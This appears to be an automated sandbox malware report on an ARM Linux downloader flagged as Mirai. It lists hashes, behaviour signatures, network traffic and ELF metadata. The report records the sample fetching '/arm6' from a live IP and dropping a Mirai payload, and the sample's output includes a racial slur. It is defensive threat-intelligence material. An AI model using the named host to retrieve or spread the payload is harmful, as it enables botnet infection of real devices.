Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
dlr.arm6.elf

Overview

General Information

Sample name:dlr.arm6.elf
Analysis ID:1582110
MD5:3056ecdbddff5f0065914d60d947a0c7
SHA1:b6af905472fb4f465623249f3d440158c9fccbe4
SHA256:4bef7822a3bf78bed8ada68d8ee30485f80b3b9d3bfab28c7896ee36b96358f4
Tags:elfuser-abuse_ch
Infos:

Detection

Score:48
Range:0 - 100
Whitelisted:false

Signatures

Multi AV Scanner detection for submitted file
Executes the "rm" command used to delete files or directories
HTTP GET or POST without a user agent
Sample has stripped symbol table
Uses the "uname" system call to query kernel version information (possible evasion)
Writes ELF files to disk

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1582110
Start date and time:2024-12-30 02:17:12 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 24s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:dlr.arm6.elf
Detection:MAL
Classification:mal48.linELF@0/1@0/0
  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
  • VT rate limit hit for: /tmp/Galaxy
Command:/tmp/dlr.arm6.elf
PID:5480
Exit Code:5
Exit Code Info:
Killed:False
Standard Output:
NIGGY
RAY
Standard Error:
  • system is lnxubuntu20
  • dash New Fork (PID: 5467, Parent: 3633)
  • rm (PID: 5467, Parent: 3633, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.7ovVSDsvBA /tmp/tmp.I0M6MszF3i /tmp/tmp.Qu4gWkzb61
  • dash New Fork (PID: 5468, Parent: 3633)
  • rm (PID: 5468, Parent: 3633, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.7ovVSDsvBA /tmp/tmp.I0M6MszF3i /tmp/tmp.Qu4gWkzb61
  • dlr.arm6.elf (PID: 5480, Parent: 5400, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/dlr.arm6.elf
  • cleanup
No yara matches
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: dlr.arm6.elfReversingLabs: Detection: 44%
Source: global trafficHTTP traffic detected: GET /arm6 HTTP/1.0Data Raw: 00 00 52 41 59 0a 00 00 00 00 00 00 Data Ascii: RAY
Source: unknownTCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknownTCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknownTCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknownTCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknownTCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknownTCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknownTCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknownTCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknownTCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknownTCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknownTCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknownTCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknownTCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknownTCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknownTCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknownTCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknownTCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknownTCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknownTCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknownTCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknownTCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknownTCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknownTCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknownTCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknownTCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknownTCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknownTCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknownTCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknownTCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknownTCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknownTCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknownTCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknownTCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknownTCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknownTCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknownTCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknownTCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknownTCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknownTCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknownTCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknownTCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknownTCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknownTCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknownTCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknownTCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknownTCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknownTCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknownTCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknownTCP traffic detected without corresponding DNS query: 103.188.82.218
Source: unknownTCP traffic detected without corresponding DNS query: 103.188.82.218
Source: global trafficHTTP traffic detected: GET /arm6 HTTP/1.0Data Raw: 00 00 52 41 59 0a 00 00 00 00 00 00 Data Ascii: RAY
Source: unknownNetwork traffic detected: HTTP traffic on port 46540 -> 443
Source: ELF static info symbol of initial sample.symtab present: no
Source: classification engineClassification label: mal48.linELF@0/1@0/0
Source: /usr/bin/dash (PID: 5467)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.7ovVSDsvBA /tmp/tmp.I0M6MszF3i /tmp/tmp.Qu4gWkzb61Jump to behavior
Source: /usr/bin/dash (PID: 5468)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.7ovVSDsvBA /tmp/tmp.I0M6MszF3i /tmp/tmp.Qu4gWkzb61Jump to behavior
Source: /tmp/dlr.arm6.elf (PID: 5480)File written: /tmp/GalaxyJump to dropped file
Source: /tmp/dlr.arm6.elf (PID: 5480)Queries kernel information via 'uname': Jump to behavior
Source: dlr.arm6.elf, 5480.1.00005639d6c5f000.00005639d6d8d000.rw-.sdmpBinary or memory string: 9V!/etc/qemu-binfmt/arm
Source: dlr.arm6.elf, 5480.1.00007ffd587e6000.00007ffd58807000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-arm/tmp/dlr.arm6.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/dlr.arm6.elf
Source: dlr.arm6.elf, 5480.1.00005639d6c5f000.00005639d6d8d000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
Source: dlr.arm6.elf, 5480.1.00007ffd587e6000.00007ffd58807000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath InterceptionPath Interception1
File Deletion
OS Credential Dumping11
Security Software Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
Ingress Tool Transfer
Traffic DuplicationData Destruction
No configs have been found
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
dlr.arm6.elf45%ReversingLabsLinux.Backdoor.Mirai
SourceDetectionScannerLabelLink
/tmp/Galaxy61%ReversingLabsLinux.Trojan.Mirai
No Antivirus matches
No Antivirus matches
No contacted domains info
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs
IPDomainCountryFlagASNASN NameMalicious
103.188.82.218
unknownunknown
7575AARNET-AS-APAustralianAcademicandResearchNetworkAARNefalse
185.125.190.26
unknownUnited Kingdom
41231CANONICAL-ASGBfalse
MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
185.125.190.26Aqua.arm6.elfGet hashmaliciousUnknownBrowse
    Aqua.arm4.elfGet hashmaliciousUnknownBrowse
      Aqua.ppc.elfGet hashmaliciousUnknownBrowse
        arm5.elfGet hashmaliciousUnknownBrowse
          x86_64.elfGet hashmaliciousUnknownBrowse
            bot.x86.elfGet hashmaliciousMirai, OkiruBrowse
              armv6l.elfGet hashmaliciousMiraiBrowse
                x86_64.elfGet hashmaliciousGafgyt, MiraiBrowse
                  bot.arm.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                    bot.arm5.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                      No context
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      CANONICAL-ASGBbin.sh.elfGet hashmaliciousMiraiBrowse
                      • 91.189.91.42
                      dlr.mips.elfGet hashmaliciousMiraiBrowse
                      • 91.189.91.42
                      main_arm.elfGet hashmaliciousMiraiBrowse
                      • 91.189.91.42
                      DemonGen-linux-amd64.elfGet hashmaliciousUnknownBrowse
                      • 91.189.91.42
                      arm5.elfGet hashmaliciousMiraiBrowse
                      • 91.189.91.42
                      i.elfGet hashmaliciousUnknownBrowse
                      • 91.189.91.42
                      arm6.elfGet hashmaliciousMirai, MoobotBrowse
                      • 91.189.91.42
                      Aqua.mips.elfGet hashmaliciousUnknownBrowse
                      • 91.189.91.42
                      i.elfGet hashmaliciousUnknownBrowse
                      • 91.189.91.42
                      109.71.252.43-boatnet.ppc-2024-12-28T20_30_37.elfGet hashmaliciousMiraiBrowse
                      • 91.189.91.42
                      AARNET-AS-APAustralianAcademicandResearchNetworkAARNearm7.elfGet hashmaliciousMirai, MoobotBrowse
                      • 103.187.127.118
                      star.ppc.elfGet hashmaliciousMirai, MoobotBrowse
                      • 103.187.81.199
                      mips.elfGet hashmaliciousMirai, MoobotBrowse
                      • 157.85.109.58
                      db0fa4b8db0333367e9bda3ab68b8042.sh4.elfGet hashmaliciousMirai, GafgytBrowse
                      • 103.177.151.232
                      db0fa4b8db0333367e9bda3ab68b8042.spc.elfGet hashmaliciousMirai, GafgytBrowse
                      • 103.183.119.78
                      4qOTcmSTSq.exeGet hashmaliciousUnknownBrowse
                      • 103.8.70.183
                      https://fsharetv.co/Get hashmaliciousUnknownBrowse
                      • 103.67.200.64
                      armv5l.elfGet hashmaliciousUnknownBrowse
                      • 103.166.191.136
                      loligang.x86.elfGet hashmaliciousMiraiBrowse
                      • 103.176.143.37
                      splm68k.elfGet hashmaliciousUnknownBrowse
                      • 130.56.86.105
                      No context
                      No context
                      Process:/tmp/dlr.arm6.elf
                      File Type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
                      Category:dropped
                      Size (bytes):76632
                      Entropy (8bit):6.114184146565819
                      Encrypted:false
                      SSDEEP:1536:annlsrwAIHMG9TKHYuOUaFKyWQWMcDiEQtNoRKjGq7yK5wYLDo:trgP9TK4uOUaF5NoRKjGqmKeok
                      MD5:47CAC71CCAF21B19830F7D068EBFF1E1
                      SHA1:3AE1402518C4ACCF4BFA935C6B6B4BA7E6C55597
                      SHA-256:EAFADF193E977C0701902EC71D64D1146C13B4C47C6728D37ADBCFC8A63B74F4
                      SHA-512:DDD532F66AC7BA5B75A36B822D5B9EF92EF0D12C03C45F56F155977253FA65F6E73A1F1C1529782276806BF2AB57C4D5459AB8E8F389E7EA950D2F2404791923
                      Malicious:true
                      Antivirus:
                      • Antivirus: ReversingLabs, Detection: 61%
                      Reputation:low
                      Preview:.ELF..............(.....T...4...x)......4. ...(......................%...%...............&...&...%..................Q.td..................................-...L.................@-.,@...0....S..... 0....S........../..0...0...@..../..).......%....-.@0....S...M.8...8......../.0....0....S.....$0....S....../........../......%...)...&.................. ... -...-.......-......0../..*.............G-......p.......... `........p..0...0....P..P...P....U......G..../.......p..@........P.....$....-..................,.........l0........P.....`0...........0....S.. ...............0....S...... ....R..........,........... ...0.........../..... )..$)....P..@-..@.......0....S.................0....R...............^..............@..../.......P.............@.......O-...Q...M..@...P..........O..../.........!<.. 4...,...4....T.......... ....T.. ............Y......1...`...pD...W....:.........'.......0f...........C.. ... ...0P..pG..0....W..0...@... ..0................W..`...P..=....P....U..`..0...
                      File type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
                      Entropy (8bit):4.838130965914829
                      TrID:
                      • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                      File name:dlr.arm6.elf
                      File size:1'444 bytes
                      MD5:3056ecdbddff5f0065914d60d947a0c7
                      SHA1:b6af905472fb4f465623249f3d440158c9fccbe4
                      SHA256:4bef7822a3bf78bed8ada68d8ee30485f80b3b9d3bfab28c7896ee36b96358f4
                      SHA512:a3ec18d2c39ff26a2d646fa9d6e4ec9fc85474dfef64c36d991a6fc77edbf50d07cfa8248588299fa0ea1895f61160ec93a5aa9781ad132a1199b565249a204a
                      SSDEEP:24:CCKGpa7Urz/jlfHAXK1hH9Vev3gRGaJ9iMjBBuplxrR+zDS+ZA:vKGpa7UrLZH/I+JdBuplxrsDS+Z
                      TLSH:5F312E91A3D05FBCCCE491BEED52431473689F40E0C77263D218B754BD2AEBC9D26046
                      File Content Preview:.ELF..............(.........4...........4. ...(.....................<...<...............<...<...<...................Q.td.........................................8...<...4...........(.."...#...../...-.......M.................../...-.......M................

                      ELF header

                      Class:ELF32
                      Data:2's complement, little endian
                      Version:1 (current)
                      Machine:ARM
                      Version Number:0x1
                      Type:EXEC (Executable file)
                      OS/ABI:UNIX - System V
                      ABI Version:0
                      Entry Point Address:0x838c
                      Flags:0x4000002
                      ELF Header Size:52
                      Program Header Offset:52
                      Program Header Size:32
                      Number of Program Headers:3
                      Section Header Offset:1164
                      Section Header Size:40
                      Number of Section Headers:7
                      Header String Table Index:6
                      NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                      NULL0x00x00x00x00x0000
                      .textPROGBITS0x80a00xa00x35c0x00x6AX0016
                      .rodataPROGBITS0x83fc0x3fc0x400x10x32AMS004
                      .gotPROGBITS0x1043c0x43c0xc0x40x3WA004
                      .bssNOBITS0x104480x4480x80x00x3WA004
                      .ARM.attributesARM_ATTRIBUTES0x00x4480x100x00x0001
                      .shstrtabSTRTAB0x00x4580x330x00x0001
                      TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                      LOAD0x00x80000x80000x43c0x43c5.25650x5R E0x8000.text .rodata
                      LOAD0x43c0x1043c0x1043c0xc0x140.00000x6RW 0x8000.got .bss
                      GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                      TimestampSource PortDest PortSource IPDest IP
                      Dec 30, 2024 02:17:52.386693001 CET4590880192.168.2.14103.188.82.218
                      Dec 30, 2024 02:17:52.391622066 CET8045908103.188.82.218192.168.2.14
                      Dec 30, 2024 02:17:52.391680956 CET4590880192.168.2.14103.188.82.218
                      Dec 30, 2024 02:17:52.392383099 CET4590880192.168.2.14103.188.82.218
                      Dec 30, 2024 02:17:52.397229910 CET8045908103.188.82.218192.168.2.14
                      Dec 30, 2024 02:17:53.360662937 CET8045908103.188.82.218192.168.2.14
                      Dec 30, 2024 02:17:53.360759020 CET8045908103.188.82.218192.168.2.14
                      Dec 30, 2024 02:17:53.360773087 CET8045908103.188.82.218192.168.2.14
                      Dec 30, 2024 02:17:53.360790968 CET8045908103.188.82.218192.168.2.14
                      Dec 30, 2024 02:17:53.360802889 CET8045908103.188.82.218192.168.2.14
                      Dec 30, 2024 02:17:53.360802889 CET4590880192.168.2.14103.188.82.218
                      Dec 30, 2024 02:17:53.360816002 CET8045908103.188.82.218192.168.2.14
                      Dec 30, 2024 02:17:53.360829115 CET8045908103.188.82.218192.168.2.14
                      Dec 30, 2024 02:17:53.360847950 CET8045908103.188.82.218192.168.2.14
                      Dec 30, 2024 02:17:53.360858917 CET8045908103.188.82.218192.168.2.14
                      Dec 30, 2024 02:17:53.360872984 CET8045908103.188.82.218192.168.2.14
                      Dec 30, 2024 02:17:53.360933065 CET4590880192.168.2.14103.188.82.218
                      Dec 30, 2024 02:17:53.360933065 CET4590880192.168.2.14103.188.82.218
                      Dec 30, 2024 02:17:53.360934019 CET4590880192.168.2.14103.188.82.218
                      Dec 30, 2024 02:17:53.360934019 CET4590880192.168.2.14103.188.82.218
                      Dec 30, 2024 02:17:53.360934019 CET4590880192.168.2.14103.188.82.218
                      Dec 30, 2024 02:17:53.360934019 CET4590880192.168.2.14103.188.82.218
                      Dec 30, 2024 02:17:53.360934019 CET4590880192.168.2.14103.188.82.218
                      Dec 30, 2024 02:17:53.360934019 CET4590880192.168.2.14103.188.82.218
                      Dec 30, 2024 02:17:53.367002964 CET8045908103.188.82.218192.168.2.14
                      Dec 30, 2024 02:17:53.367021084 CET8045908103.188.82.218192.168.2.14
                      Dec 30, 2024 02:17:53.367053986 CET4590880192.168.2.14103.188.82.218
                      Dec 30, 2024 02:17:53.367053986 CET4590880192.168.2.14103.188.82.218
                      Dec 30, 2024 02:17:53.367296934 CET8045908103.188.82.218192.168.2.14
                      Dec 30, 2024 02:17:53.367345095 CET4590880192.168.2.14103.188.82.218
                      Dec 30, 2024 02:17:53.620887041 CET8045908103.188.82.218192.168.2.14
                      Dec 30, 2024 02:17:53.620903015 CET8045908103.188.82.218192.168.2.14
                      Dec 30, 2024 02:17:53.620913029 CET8045908103.188.82.218192.168.2.14
                      Dec 30, 2024 02:17:53.620940924 CET4590880192.168.2.14103.188.82.218
                      Dec 30, 2024 02:17:53.620940924 CET4590880192.168.2.14103.188.82.218
                      Dec 30, 2024 02:17:53.621005058 CET4590880192.168.2.14103.188.82.218
                      Dec 30, 2024 02:17:53.630039930 CET8045908103.188.82.218192.168.2.14
                      Dec 30, 2024 02:17:53.630068064 CET8045908103.188.82.218192.168.2.14
                      Dec 30, 2024 02:17:53.630076885 CET8045908103.188.82.218192.168.2.14
                      Dec 30, 2024 02:17:53.630081892 CET4590880192.168.2.14103.188.82.218
                      Dec 30, 2024 02:17:53.630109072 CET4590880192.168.2.14103.188.82.218
                      Dec 30, 2024 02:17:53.630151987 CET4590880192.168.2.14103.188.82.218
                      Dec 30, 2024 02:17:53.648361921 CET8045908103.188.82.218192.168.2.14
                      Dec 30, 2024 02:17:53.648374081 CET8045908103.188.82.218192.168.2.14
                      Dec 30, 2024 02:17:53.648385048 CET8045908103.188.82.218192.168.2.14
                      Dec 30, 2024 02:17:53.648410082 CET4590880192.168.2.14103.188.82.218
                      Dec 30, 2024 02:17:53.648410082 CET4590880192.168.2.14103.188.82.218
                      Dec 30, 2024 02:17:53.648453951 CET4590880192.168.2.14103.188.82.218
                      Dec 30, 2024 02:17:53.666480064 CET8045908103.188.82.218192.168.2.14
                      Dec 30, 2024 02:17:53.666491032 CET8045908103.188.82.218192.168.2.14
                      Dec 30, 2024 02:17:53.666501045 CET8045908103.188.82.218192.168.2.14
                      Dec 30, 2024 02:17:53.666536093 CET4590880192.168.2.14103.188.82.218
                      Dec 30, 2024 02:17:53.666536093 CET4590880192.168.2.14103.188.82.218
                      Dec 30, 2024 02:17:53.666536093 CET4590880192.168.2.14103.188.82.218
                      Dec 30, 2024 02:17:53.684675932 CET8045908103.188.82.218192.168.2.14
                      Dec 30, 2024 02:17:53.684686899 CET8045908103.188.82.218192.168.2.14
                      Dec 30, 2024 02:17:53.684698105 CET8045908103.188.82.218192.168.2.14
                      Dec 30, 2024 02:17:53.684746981 CET4590880192.168.2.14103.188.82.218
                      Dec 30, 2024 02:17:53.684747934 CET4590880192.168.2.14103.188.82.218
                      Dec 30, 2024 02:17:53.684747934 CET4590880192.168.2.14103.188.82.218
                      Dec 30, 2024 02:17:53.702850103 CET8045908103.188.82.218192.168.2.14
                      Dec 30, 2024 02:17:53.702862024 CET8045908103.188.82.218192.168.2.14
                      Dec 30, 2024 02:17:53.702872038 CET8045908103.188.82.218192.168.2.14
                      Dec 30, 2024 02:17:53.702908039 CET4590880192.168.2.14103.188.82.218
                      Dec 30, 2024 02:17:53.703056097 CET4590880192.168.2.14103.188.82.218
                      Dec 30, 2024 02:17:53.721168041 CET8045908103.188.82.218192.168.2.14
                      Dec 30, 2024 02:17:53.721179008 CET8045908103.188.82.218192.168.2.14
                      Dec 30, 2024 02:17:53.721189022 CET8045908103.188.82.218192.168.2.14
                      Dec 30, 2024 02:17:53.722265005 CET4590880192.168.2.14103.188.82.218
                      Dec 30, 2024 02:17:53.739294052 CET8045908103.188.82.218192.168.2.14
                      Dec 30, 2024 02:17:53.739309072 CET8045908103.188.82.218192.168.2.14
                      Dec 30, 2024 02:17:53.739324093 CET8045908103.188.82.218192.168.2.14
                      Dec 30, 2024 02:17:53.740247011 CET4590880192.168.2.14103.188.82.218
                      Dec 30, 2024 02:17:53.757502079 CET8045908103.188.82.218192.168.2.14
                      Dec 30, 2024 02:17:53.757513046 CET8045908103.188.82.218192.168.2.14
                      Dec 30, 2024 02:17:53.757522106 CET8045908103.188.82.218192.168.2.14
                      Dec 30, 2024 02:17:53.757960081 CET4590880192.168.2.14103.188.82.218
                      Dec 30, 2024 02:17:53.775809050 CET8045908103.188.82.218192.168.2.14
                      Dec 30, 2024 02:17:53.775820017 CET8045908103.188.82.218192.168.2.14
                      Dec 30, 2024 02:17:53.775829077 CET8045908103.188.82.218192.168.2.14
                      Dec 30, 2024 02:17:53.776431084 CET4590880192.168.2.14103.188.82.218
                      Dec 30, 2024 02:17:53.881071091 CET8045908103.188.82.218192.168.2.14
                      Dec 30, 2024 02:17:53.881082058 CET8045908103.188.82.218192.168.2.14
                      Dec 30, 2024 02:17:53.881091118 CET8045908103.188.82.218192.168.2.14
                      Dec 30, 2024 02:17:53.881118059 CET4590880192.168.2.14103.188.82.218
                      Dec 30, 2024 02:17:53.890192986 CET8045908103.188.82.218192.168.2.14
                      Dec 30, 2024 02:17:53.890204906 CET8045908103.188.82.218192.168.2.14
                      Dec 30, 2024 02:17:53.890218973 CET8045908103.188.82.218192.168.2.14
                      Dec 30, 2024 02:17:53.891674042 CET4590880192.168.2.14103.188.82.218
                      Dec 30, 2024 02:17:53.908395052 CET8045908103.188.82.218192.168.2.14
                      Dec 30, 2024 02:17:53.908421993 CET8045908103.188.82.218192.168.2.14
                      Dec 30, 2024 02:17:53.908432961 CET8045908103.188.82.218192.168.2.14
                      Dec 30, 2024 02:17:53.908451080 CET8045908103.188.82.218192.168.2.14
                      Dec 30, 2024 02:17:53.910602093 CET4590880192.168.2.14103.188.82.218
                      Dec 30, 2024 02:17:53.926541090 CET8045908103.188.82.218192.168.2.14
                      Dec 30, 2024 02:17:53.926619053 CET8045908103.188.82.218192.168.2.14
                      Dec 30, 2024 02:17:53.926629066 CET8045908103.188.82.218192.168.2.14
                      Dec 30, 2024 02:17:53.927472115 CET4590880192.168.2.14103.188.82.218
                      Dec 30, 2024 02:17:53.944690943 CET8045908103.188.82.218192.168.2.14
                      Dec 30, 2024 02:17:53.944709063 CET8045908103.188.82.218192.168.2.14
                      Dec 30, 2024 02:17:53.944717884 CET8045908103.188.82.218192.168.2.14
                      Dec 30, 2024 02:17:53.944880962 CET4590880192.168.2.14103.188.82.218
                      Dec 30, 2024 02:17:53.962878942 CET8045908103.188.82.218192.168.2.14
                      Dec 30, 2024 02:17:53.962897062 CET8045908103.188.82.218192.168.2.14
                      Dec 30, 2024 02:17:53.962905884 CET8045908103.188.82.218192.168.2.14
                      Dec 30, 2024 02:17:53.963888884 CET4590880192.168.2.14103.188.82.218
                      Dec 30, 2024 02:17:53.981169939 CET8045908103.188.82.218192.168.2.14
                      Dec 30, 2024 02:17:53.981178999 CET8045908103.188.82.218192.168.2.14
                      Dec 30, 2024 02:17:53.981189013 CET8045908103.188.82.218192.168.2.14
                      Dec 30, 2024 02:17:53.981880903 CET4590880192.168.2.14103.188.82.218
                      Dec 30, 2024 02:17:53.999330044 CET8045908103.188.82.218192.168.2.14
                      Dec 30, 2024 02:17:53.999341011 CET8045908103.188.82.218192.168.2.14
                      Dec 30, 2024 02:17:53.999346018 CET8045908103.188.82.218192.168.2.14
                      Dec 30, 2024 02:17:54.000684977 CET4590880192.168.2.14103.188.82.218
                      Dec 30, 2024 02:17:54.017417908 CET8045908103.188.82.218192.168.2.14
                      Dec 30, 2024 02:17:54.017436028 CET8045908103.188.82.218192.168.2.14
                      Dec 30, 2024 02:17:54.017445087 CET8045908103.188.82.218192.168.2.14
                      Dec 30, 2024 02:17:54.017682076 CET4590880192.168.2.14103.188.82.218
                      Dec 30, 2024 02:17:54.033905983 CET8045908103.188.82.218192.168.2.14
                      Dec 30, 2024 02:17:54.033924103 CET8045908103.188.82.218192.168.2.14
                      Dec 30, 2024 02:17:54.033931971 CET8045908103.188.82.218192.168.2.14
                      Dec 30, 2024 02:17:54.036484957 CET4590880192.168.2.14103.188.82.218
                      Dec 30, 2024 02:17:54.049350977 CET8045908103.188.82.218192.168.2.14
                      Dec 30, 2024 02:17:54.049386978 CET8045908103.188.82.218192.168.2.14
                      Dec 30, 2024 02:17:54.050668001 CET4590880192.168.2.14103.188.82.218
                      Dec 30, 2024 02:17:54.056629896 CET8045908103.188.82.218192.168.2.14
                      Dec 30, 2024 02:17:54.056668997 CET8045908103.188.82.218192.168.2.14
                      Dec 30, 2024 02:17:54.056679010 CET8045908103.188.82.218192.168.2.14
                      Dec 30, 2024 02:17:54.057363987 CET4590880192.168.2.14103.188.82.218
                      Dec 30, 2024 02:17:54.071172953 CET8045908103.188.82.218192.168.2.14
                      Dec 30, 2024 02:17:54.071291924 CET8045908103.188.82.218192.168.2.14
                      Dec 30, 2024 02:17:54.095370054 CET8045908103.188.82.218192.168.2.14
                      Dec 30, 2024 02:17:54.095415115 CET4590880192.168.2.14103.188.82.218
                      Dec 30, 2024 02:17:54.675180912 CET4590880192.168.2.14103.188.82.218
                      Dec 30, 2024 02:17:54.680146933 CET8045908103.188.82.218192.168.2.14
                      Dec 30, 2024 02:18:04.910059929 CET46540443192.168.2.14185.125.190.26
                      Dec 30, 2024 02:18:36.396878004 CET46540443192.168.2.14185.125.190.26
                      Session IDSource IPSource PortDestination IPDestination Port
                      0192.168.2.1445908103.188.82.21880
                      TimestampBytes transferredDirectionData
                      Dec 30, 2024 02:17:52.392383099 CET46OUTGET /arm6 HTTP/1.0
                      Data Raw: 00 00 52 41 59 0a 00 00 00 00 00 00
                      Data Ascii: RAY
                      Dec 30, 2024 02:17:53.360662937 CET711INHTTP/1.0 200 OK
                      Accept-Ranges: bytes
                      Content-Length: 76632
                      Content-Type: application/octet-stream
                      Last-Modified: Wed, 25 Dec 2024 10:50:30 GMT
                      Date: Mon, 30 Dec 2024 01:17:52 GMT
